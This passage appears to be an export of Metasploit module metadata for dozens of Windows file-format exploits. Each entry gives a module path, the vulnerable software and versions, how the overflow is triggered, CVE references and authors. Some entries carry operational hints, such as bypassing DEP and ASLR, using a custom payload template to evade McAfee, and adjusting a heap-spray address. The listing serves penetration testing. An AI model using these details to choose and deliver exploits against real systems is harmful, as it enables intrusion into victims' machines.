NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH","Metasploit Framework License (BSD)","f","2009-12-05 00:00:00",0,,"aggressive","t","CVE-2009-4265, EDB-10319, EDB-12403, EDB-12404, EDB-12540, OSVDB-60681","Dr_IDE, dookie, jduck " 636,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb","exploit","windows/fileformat/irfanview_jpeg2000_bof","exploit/windows/fileformat/irfanview_jpeg2000_bof","Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview's window. An egg hunter is used for stability.","Metasploit Framework License (BSD)","f","2012-01-16 00:00:00",0,,"aggressive","t","BID-51426, CVE-2012-0897, OSVDB-78333, URL-http://www.greyhathacker.net/?p=525","Parvez Anwar , juan vazquez , mr_me " 637,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb","exploit","windows/fileformat/ispvm_xcf_ispxcf","exploit/windows/fileformat/ispvm_xcf_ispxcf","Lattice Semiconductor ispVM System XCF File Handling Overflow",300,"This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially crafted file, when a long value is supplied for the version attribute of the ispXCF tag. 
It results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-05-16 00:00:00",0,,"aggressive","t","BID-53562, OSVDB-82000, URL-http://secunia.com/advisories/48740/","Unknown, juan vazquez " 638,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb","exploit","windows/fileformat/kingview_kingmess_kvl","exploit/windows/fileformat/kingview_kingmess_kvl","KingView Log File Parsing Buffer Overflow",300,"This module exploits a vulnerability found in KingView <= 6.55. It exists in the KingMess.exe application when handling log files, due to the insecure usage of sprintf. This module uses a malformed .kvl file which must be opened by the victim via the KingMess.exe application, through the 'Browse Log Files' option. The module has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-20 00:00:00",0,,"aggressive","t","BID-57909, CVE-2012-4711, OSVDB-89690, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf","Carlos Mario Penagos Hollman, Lucas Apa, juan vazquez " 639,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/lattice_pac_bof.rb","exploit","windows/fileformat/lattice_pac_bof","exploit/windows/fileformat/lattice_pac_bof","Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",300,"This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer 6.21. 
As a .pac file, when supplying a long string of data to the 'value' field under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption on the stack, which results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-05-16 00:00:00",0,,"aggressive","t","BID-53566, CVE-2012-2915, EDB-19006, OSVDB-82001, URL-http://secunia.com/advisories/48741","Unknown, juan vazquez , sinn3r " 640,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/lotusnotes_lzh.rb","exploit","windows/fileformat/lotusnotes_lzh","exploit/windows/fileformat/lotusnotes_lzh","Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",400,"This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered by binaryhouse.net","Metasploit Framework License (BSD)","f","2011-05-24 00:00:00",0,,"passive","t","BID-48018, CVE-2011-1213, OSVDB-72706, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904, URL-http://www.ibm.com/support/docview.wss?uid=swg21500034","alino <26alino@gmail.com>, binaryhouse.net" 641,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb","exploit","windows/fileformat/magix_musikmaker_16_mmm","exploit/windows/fileformat/magix_musikmaker_16_mmm","Magix Musik Maker 16 .mmm Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. 
Egghunter is used, and might require up to several seconds to receive a shell.","Metasploit Framework License (BSD)","f","2011-04-26 00:00:00",0,,"aggressive","t","OSVDB-72063, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002","acidgen, corelanc0d3r " 642,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb","exploit","windows/fileformat/mcafee_hercules_deletesnapshot","exploit/windows/fileformat/mcafee_hercules_deletesnapshot","McAfee Remediation Client ActiveX Control Buffer Overflow",100,"This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When sending an overly long string to the DeleteSnapshot() method of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-08-04 00:00:00",0,,"aggressive","t","URL-http://www.metasploit.com","MC " 643,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb","exploit","windows/fileformat/mcafee_showreport_exec","exploit/windows/fileformat/mcafee_showreport_exec","McAfee SaaS MyCioScan ShowReport Remote Command Execution",300,"This module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, which therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. 
Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.","Metasploit Framework License (BSD)","f","2012-01-12 00:00:00",0,,"passive","t","BID-51397, OSVDB-78310, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-012","rgod, sinn3r " 644,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mediajukebox.rb","exploit","windows/fileformat/mediajukebox","exploit/windows/fileformat/mediajukebox","Media Jukebox 8.0.400 Buffer Overflow (SEH)",300,"This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.","Metasploit Framework License (BSD)","f","2009-07-01 00:00:00",0,,"aggressive","t","CVE-2009-2650, OSVDB-55924","Ron Henry , dijital1" 645,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/microp_mppl.rb","exploit","windows/fileformat/microp_mppl","exploit/windows/fileformat/microp_mppl","MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",500,"This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFileName parameter of a CreateFileA() function, and results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-08-23 00:00:00",0,,"aggressive","t","EDB-14720, OSVDB-73627","James Fitts " 646,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/millenium_mp3_pls.rb","exploit","windows/fileformat/millenium_mp3_pls","exploit/windows/fileformat/millenium_mp3_pls","Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. 
An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2009-07-30 00:00:00",0,,"aggressive","t","EDB-10240, EDB-9618, OSVDB-56574","Molotov, dookie, jduck " 647,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb","exploit","windows/fileformat/mini_stream_pls_bof","exploit/windows/fileformat/mini_stream_pls_bof","Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.","Metasploit Framework License (BSD)","f","2010-07-16 00:00:00",0,,"aggressive","t","BID-34514, EDB-14373","James Fitts , Madjix, Tiago Henriques" 648,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb","exploit","windows/fileformat/mjm_coreplayer2011_s3m","exploit/windows/fileformat/mjm_coreplayer2011_s3m","MJM Core Player 2011 .s3m Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in MJM Core Player 2011. When opening a malicious s3m file in this application, a stack buffer overflow can be triggered, resulting in arbitrary code execution. 
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-30 00:00:00",0,,"aggressive","t","OSVDB-72101, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004","corelanc0d3r , rick2600" 649,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb","exploit","windows/fileformat/mjm_quickplayer_s3m","exploit/windows/fileformat/mjm_quickplayer_s3m","MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-30 00:00:00",0,,"aggressive","t","OSVDB-72102, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003","corelanc0d3r , rick2600" 650,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb","exploit","windows/fileformat/moxa_mediadbplayback","exploit/windows/fileformat/moxa_mediadbplayback","MOXA MediaDBPlayback ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. 
When sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-10-19 00:00:00",0,,"aggressive","t","CVE-2010-4742, OSVDB-68986, URL-http://www.moxa.com","MC " 651,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mplayer_sami_bof.rb","exploit","windows/fileformat/mplayer_sami_bof","exploit/windows/fileformat/mplayer_sami_bof","MPlayer SAMI Subtitle File Buffer Overflow",300,"This module exploits a stack-based buffer overflow found in the handling of SAMI subtitle files in MPlayer SVN Versions before 33471. It currently targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer. The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitle file from the GUI. Or, it can also be done from the console with the mplayer ""-sub"" option.","Metasploit Framework License (BSD)","f","2011-05-19 00:00:00",0,,"aggressive","t","BID-49149, OSVDB-74604, URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf","Jacques Louw, juan vazquez " 652,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb","exploit","windows/fileformat/ms09_067_excel_featheader","exploit/windows/fileformat/ms09_067_excel_featheader","Microsoft Excel Malformed FEATHEADER Record Vulnerability",400,"This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. 
Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.","Metasploit Framework License (BSD)","f","2009-11-10 00:00:00",,,"aggressive","t","BID-36945, CVE-2009-3129, MSB-MS09-067, OSVDB-59860, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-083/","Sean Larsson, jduck " 653,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb","exploit","windows/fileformat/ms10_004_textbytesatom","exploit/windows/fileformat/ms10_004_textbytesatom","Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",400,"This module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.","Metasploit Framework License (BSD)","f","2010-02-09 00:00:00",,,"aggressive","t","CVE-2010-0033, MSB-MS10-004, OSVDB-62241, URL-http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-017/","SkD, Snake, jduck " 654,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb","exploit","windows/fileformat/ms10_038_excel_obj_bof","exploit/windows/fileformat/ms10_038_excel_obj_bof","MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",300,"This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. 
By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get control of the execution flow. This results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-06-08 00:00:00",1,,"aggressive","t","BID-40520, CVE-2010-0822, MSB-MS10-038, OSVDB-65236, URL-http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/","Nicolas Joly, Shahin Ramezany , juan vazquez " 655,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb","exploit","windows/fileformat/ms10_087_rtf_pfragments_bof","exploit/windows/fileformat/ms10_087_rtf_pfragments_bof","Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",500,"This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. 
It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.","Metasploit Framework License (BSD)","f","2010-11-09 00:00:00",0,,"aggressive","t","BID-44652, CVE-2010-3333, MSB-MS10-087, OSVDB-69085, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880","DJ Manila Ice, Vesh, CA, jduck , unknown, wushi of team509" 656,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb","exploit","windows/fileformat/ms11_006_createsizeddibsection","exploit/windows/fileformat/ms11_006_createsizeddibsection","Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the ""Thumbnails"" view.","Metasploit Framework License (BSD)","f","2010-12-15 00:00:00",0,,"aggressive","t","BID-45662, CVE-2010-3970, MSB-MS11-006, OSVDB-70263, URL-http://www.microsoft.com/technet/security/advisory/2490606.mspx, URL-http://www.powerofcommunity.net/schedule.html","Moti & Xu Hao, Yaniv Miron aka Lament of ilhack, jduck " 657,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb","exploit","windows/fileformat/ms11_021_xlb_bof","exploit/windows/fileformat/ms11_021_xlb_bof","MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",300,"This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack-based buffer overflow. 
This results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2011-08-09 00:00:00",0,,"aggressive","t","CVE-2011-0105, MSB-MS11-021, OSVDB-71765, URL-http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-121/","Aniway, abysssec, juan vazquez , sinn3r " 658,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms12_005.rb","exploit","windows/fileformat/ms12_005","exploit/windows/fileformat/ms12_005","MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",600,"This module exploits a vulnerability found in Microsoft Office's ClickOnce feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This can allow attackers to trick victims into opening the malicious document, which will load up either a python or ruby payload, and finally, download and execute an executable.","Metasploit Framework License (BSD)","f","2012-01-10 00:00:00",0,,"passive","t","BID-51284, CVE-2012-0013, MSB-MS12-005, OSVDB-78207, URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/, URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146","Yorick Koster, sinn3r " 659,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb","exploit","windows/fileformat/ms12_027_mscomctl_bof","exploit/windows/fileformat/ms12_027_mscomctl_bof","MS12-027 MSCOMCTL ActiveX Buffer Overflow",200,"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. 
The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses ""msgr3en.dll"", which will load after Office has loaded, so the malicious file must be loaded through ""File / Open"" to achieve exploitation.","Metasploit Framework License (BSD)","f","2012-04-10 00:00:00",0,,"aggressive","t","BID-52911, CVE-2012-0158, MSB-MS12-027, OSVDB-81125, URL-http://abysssec.com/files/The_Arashi.pdf, URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html","Unknown, juan vazquez , sinn3r " 660,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb","exploit","windows/fileformat/ms_visual_basic_vbp","exploit/windows/fileformat/ms_visual_basic_vbp","Microsoft Visual Basic VBP Buffer Overflow",400,"This module exploits a stack overflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line is opened, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-09-04 00:00:00",0,,"aggressive","t","BID-25629, CVE-2007-4776, OSVDB-36936","MC " 661,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb","exploit","windows/fileformat/msworks_wkspictureinterface","exploit/windows/fileformat/msworks_wkspictureinterface","Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution",100,"The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. 
This control is not marked safe for scripting, please choose your attack vector carefully.","Metasploit Framework License (BSD)","f","2008-11-28 00:00:00",0,,"aggressive","t","CVE-2008-1898, OSVDB-44458","dean " 662,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mymp3player_m3u.rb","exploit","windows/fileformat/mymp3player_m3u","exploit/windows/fileformat/mymp3player_m3u","Steinberg MyMP3Player 3.0 Buffer Overflow",400,"This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When the application is used to open a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-03-18 00:00:00",0,,"aggressive","t","EDB-11791, OSVDB-64580","m_101, n3w7u" 663,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/netop.rb","exploit","windows/fileformat/netop","exploit/windows/fileformat/netop","NetOp Remote Control Client 9.5 Buffer Overflow",300,"This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5. Opening a .dws file containing a specially crafted string longer than 520 characters will allow an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-04-28 00:00:00",0,,"aggressive","t","EDB-17223, OSVDB-72291","Ruben Alejandro ""chap0""" 664,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb","exploit","windows/fileformat/nuance_pdf_launch_overflow","exploit/windows/fileformat/nuance_pdf_launch_overflow","Nuance PDF Reader v6.0 Launch Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. 
This exploit does not use javascript.","Metasploit Framework License (BSD)","f","2010-10-08 00:00:00",0,,"aggressive","t","OSVDB-68514, URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/","corelanc0d3r , rick2600" 665,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/openoffice_ole.rb","exploit","windows/fileformat/openoffice_ole","exploit/windows/fileformat/openoffice_ole","OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",300,"This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on Microsoft Windows XP SP3. By supplying an OLE file with a malformed DocumentSummaryInformation stream, an attacker can gain control of the execution flow, which results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2008-04-17 00:00:00",0,,"aggressive","t","BID-28819, CVE-2008-0320, EDB-5584, OSVDB-44472, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694","Marsu , juan vazquez " 666,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb","exploit","windows/fileformat/orbit_download_failed_bof","exploit/windows/fileformat/orbit_download_failed_bof","Orbit Downloader URL Unicode Conversion Overflow",300,"This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting a URL ASCII string to Unicode in an insecure way with MultiByteToWideChar. 
The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the ""File->Add Metalink..."" option.","Metasploit Framework License (BSD)","f","2008-04-03 00:00:00",0,,"aggressive","t","BID-28541, CVE-2008-1602, OSVDB-44036, URL-http://www.coresecurity.com/content/orbit-downloader","Diego Juarez, juan vazquez " 667,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/orbital_viewer_orb.rb","exploit","windows/fileformat/orbital_viewer_orb","exploit/windows/fileformat/orbital_viewer_orb","Orbital Viewer ORB File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.","Metasploit Framework License (BSD)","f","2010-02-27 00:00:00",0,,"aggressive","t","BID-38436, CVE-2010-0688, EDB-11581, OSVDB-62580, URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/","jduck " 668,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ovf_format_string.rb","exploit","windows/fileformat/ovf_format_string","exploit/windows/fileformat/ovf_format_string","VMWare OVF Tools Format String Vulnerability",300,"This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-08 00:00:00",0,,"aggressive","t","BID-56468, CVE-2012-3569, OSVDB-87117, URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html","Jeremy Brown, juan vazquez " 669,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb","exploit","windows/fileformat/proshow_cellimage_bof","exploit/windows/fileformat/proshow_cellimage_bof","ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to victim and the victim must open the file.","Metasploit Framework License (BSD)","f","2009-08-20 00:00:00",0,,"aggressive","t","CVE-2009-3214, EDB-9483, EDB-9519, OSVDB-57226","jduck " 670,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/proshow_load_bof.rb","exploit","windows/fileformat/proshow_load_bof","exploit/windows/fileformat/proshow_load_bof","Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Photodex ProShow Producer v5.0.3256 in the handling of the plugins load list file. An attacker must send the crafted ""load"" file to victim, who must store it in the installation directory. The vulnerability will be triggered the next time ProShow is opened. 
The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2012-06-06 00:00:00",0,,"aggressive","t","EDB-19563, EDB-20036, OSVDB-83745, URL-http://security.inshell.net/advisory/30","Julien Ahrens, juan vazquez , mr.pr0n" 671,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb","exploit","windows/fileformat/real_networks_netzip_bof","exploit/windows/fileformat/real_networks_netzip_bof","Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability",400,"This module exploits a stack-based buffer overflow vulnerability in version 7.5.1 86 of Real Networks Netzip Classic. In order for the command to be executed, an attacker must convince someone to load a specially crafted zip file with NetZip Classic. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2011-01-30 00:00:00",0,,"aggressive","t","BID-46059, EDB-16083, URL-http://proforma.real.com","C4SS!0 G0M3S, TecR0c " 672,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/real_player_url_property_bof.rb","exploit","windows/fileformat/real_player_url_property_bof","exploit/windows/fileformat/real_player_url_property_bof","RealPlayer RealMedia File Handling Buffer Overflow",300,"This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. 
It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.","Metasploit Framework License (BSD)","f","2012-12-14 00:00:00",0,,"aggressive","t","BID-56956, CVE-2012-5691, OSVDB-88486, URL-http://service.real.com/realplayer/security/12142012_player/en/","suto " 673,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb","exploit","windows/fileformat/safenet_softremote_groupname","exploit/windows/fileformat/safenet_softremote_groupname","SafeNet SoftRemote GROUPNAME Buffer Overflow",400,"This module exploits a stack buffer overflow in SafeNet SoftRemote Security Policy Editor <= 10.8.5. When an attacker creates a specially formatted security policy with an overly long GROUPNAME argument, it is possible to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-30 00:00:00",0,,"aggressive","t","CVE-2009-3861, OSVDB-59660, URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008","MC " 674,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/sascam_get.rb","exploit","windows/fileformat/sascam_get","exploit/windows/fileformat/sascam_get","SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow",100,"The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. 
